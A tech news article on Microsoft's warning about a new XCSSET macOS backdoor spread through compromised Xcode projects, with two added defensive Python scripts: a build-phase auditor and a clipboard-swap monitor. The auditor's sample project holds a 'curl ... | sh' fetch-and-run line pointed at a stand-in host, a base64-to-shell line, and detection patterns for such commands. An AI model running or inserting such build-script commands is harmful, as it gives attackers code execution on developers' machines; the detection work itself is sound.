Microsoft flags dangerous XCSSET macOS malware targeting developers - so be on your guard

Image: macOS's app switcher (Image credit: MacFormat)

  • Microsoft detects upgraded XCSSET macOS backdoor used in limited targeted attacks
  • New variant steals Firefox data and hijacks clipboard to redirect cryptocurrency transactions
  • Apple and GitHub are removing malicious repositories linked to the campaign

Microsoft is warning about a new variant of a known macOS backdoor which builds on previous iterations by providing additional capabilities for the attackers.

In its latest report, Microsoft Threat Intelligence claims to have seen an upgraded XCSSET macOS backdoor being used in “limited attacks”.

Developers who unknowingly used compromised Xcode projects would build and run their apps, which triggered the malware. Once on the system, XCSSET would quietly install itself and begin stealing sensitive data such as browser cookies, credentials, and messages. It would also hijack Safari and other browsers to inject malicious code and bypass security protections.

Targeting Firefox and the clipboard

XCSSET was first spotted in 2020, and is primarily known for infecting Xcode development projects used by macOS developers.

Xcode is Apple’s official integrated development environment (IDE) for building apps on macOS, iOS, iPadOS, watchOS, and tvOS.
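The infection path described above, a project that runs the payload when a developer builds it, suggests a simple check a developer can run before opening a project pulled from a repository. The script below is an added example, not code from the article, from Microsoft, or from any XCSSET analysis. It assumes, as published analyses of this family describe, that a compromised project carries its payload in a Run Script build phase stored in the project's project.pbxproj file; the article itself does not detail the mechanism. It lists every script phase in the file with heuristic review flags. The sample project excerpt, the indicator patterns and the short hex phase ids are all constructed for the example.

```python
import re
import sys

# Constructed excerpt in the shape of a project.pbxproj file (the OpenStep-style
# plist Xcode writes). One benign script phase and one with the kind of
# obfuscated, out-of-tree invocation that warrants review.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
    AA01 /* Run Script */ = {
        isa = PBXShellScriptBuildPhase;
        name = "Run Script";
        shellPath = /bin/sh;
        shellScript = "swiftlint --strict\n";
    };
    AA02 /* ShellScript */ = {
        isa = PBXShellScriptBuildPhase;
        shellPath = /bin/sh;
        shellScript = "echo ZWNobyBoaQ== | base64 -d | sh\ncurl -fsSL http://example.invalid/x | sh\n";
    };
/* End PBXShellScriptBuildPhase section */
'''

# One "<id> /* name */ = { ... };" object in the pbxproj object graph.
PHASE_RE = re.compile(
    r"(?P<id>[0-9A-Fa-f]+)\s*/\*\s*(?P<name>[^*]*?)\s*\*/\s*=\s*\{(?P<body>.*?)\n\s*\};",
    re.DOTALL,
)
# The script body is a double-quoted string with backslash escapes.
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;', re.DOTALL)

# Review heuristics (constructed for this example, not a complete signature set).
INDICATORS = [
    ("base64 decode piped to shell", re.compile(r"base64\s+(-d|--decode)[^\n|]*\|\s*(sh|bash|zsh)\b")),
    ("remote fetch piped to shell", re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(sh|bash|zsh)\b")),
    ("eval of a constructed string", re.compile(r"\beval\b")),
    ("script run from outside the project tree", re.compile(r"(/tmp/|/var/folders/|\$HOME/\.|~/\.)")),
]


def unescape(s):
    """Undo pbxproj string escapes: \\n, \\t, \\\" and \\\\."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)


def audit_pbxproj(text):
    """Return every shell-script build phase with the review flags it triggers."""
    findings = []
    for m in PHASE_RE.finditer(text):
        body = m.group("body")
        if "PBXShellScriptBuildPhase" not in body:
            continue
        sm = SCRIPT_RE.search(body)
        script = unescape(sm.group(1)) if sm else ""
        hits = [label for label, pat in INDICATORS if pat.search(script)]
        findings.append({"phase": m.group("id"), "name": m.group("name"),
                         "script": script, "hits": hits})
    return findings


def report(findings):
    for f in findings:
        status = "REVIEW" if f["hits"] else "ok"
        print(f"[{status}] phase {f['phase']} ({f['name']})")
        for line in f["script"].rstrip("\n").splitlines():
            print("    " + line)
        for h in f["hits"]:
            print("    -> " + h)


if __name__ == "__main__":
    # Usage: python audit_pbxproj.py MyApp.xcodeproj/project.pbxproj
    # Without an argument the constructed sample is audited.
    source = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    report(audit_pbxproj(source))
```

The scan is deliberately simple text matching rather than a full pbxproj parser: the point is to surface every script that will execute at build time, flagged or not, so a developer reads it before pressing Build. A phase with no flags still deserves a glance; the flags only prioritise.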

Five years later, Microsoft spotted a new version of XCSSET, with a few notable changes.

First, it can now steal Firefox browser data, too, by installing a modified build of the open-source HackBrowserData tool.

Second, it comes with a component that can hijack the clipboard - a common technique among criminals looking to steal cryptocurrency.

When the malware detects a cryptocurrency address in the clipboard, it replaces it with one belonging to the attackers, so a victim who copies and pastes a recipient address ends up sending funds to the attackers instead.
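The swap just described has a detectable shape: the clipboard holds one address, and moments later, with no new copy by the user, it holds a different address of the same kind. The monitor below is an added example, not code from the article or from the Microsoft report. It assumes a macOS host (it reads the clipboard through the standard pbpaste command) and uses loose, shape-only patterns for Bitcoin and Ethereum addresses; both the patterns and the two-second window are constructed heuristics, not validators.

```python
import re
import subprocess
import time

# Shape-only patterns for common address families (constructed heuristics;
# they check length and alphabet, not checksums).
ADDRESS_PATTERNS = {
    "btc_legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "btc_bech32": re.compile(r"^bc1[a-z0-9]{25,59}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def classify(text):
    """Return the address family `text` looks like, or None."""
    s = text.strip()
    for name, pat in ADDRESS_PATTERNS.items():
        if pat.match(s):
            return name
    return None


def is_suspicious_swap(previous, current):
    """True when an address was replaced by a different address of the same family."""
    prev_kind = classify(previous)
    return (prev_kind is not None
            and classify(current) == prev_kind
            and previous.strip() != current.strip())


def read_clipboard():
    """macOS only: pbpaste prints the current text contents of the pasteboard."""
    return subprocess.run(["pbpaste"], capture_output=True, text=True).stdout


def monitor(interval=0.5, window=2.0):
    """Poll the clipboard and alert on a same-family address change inside `window` seconds.

    A person copying two different addresses by hand rarely does so within two
    seconds; a clipboard hijacker rewrites the value almost immediately.
    """
    last, last_t = read_clipboard(), time.monotonic()
    while True:
        time.sleep(interval)
        now, t = read_clipboard(), time.monotonic()
        if now == last:
            continue
        if is_suspicious_swap(last, now) and t - last_t <= window:
            print(f"[ALERT] clipboard address replaced after {t - last_t:.1f}s: "
                  f"{last.strip()!r} -> {now.strip()!r}")
        last, last_t = now, t


if __name__ == "__main__":
    monitor()
```

Run it in a terminal while working with wallet addresses; the alert is only a prompt to re-check the pasted address against the source, since the heuristic cannot tell a hijacker from a very fast second copy. The same classify/swap logic can be reused in an endpoint agent that has access to the pasteboard change counter, which removes the timing guesswork.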

Finally, the malware comes with a new persistence method, which keeps it hidden on the compromised device for longer.

The good news is that Microsoft has only seen it in limited attacks, so it has not yet caused significant damage. Microsoft has already notified both Apple and GitHub, who are working on removing the repositories linked to the campaign.

Via BleepingComputer


Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
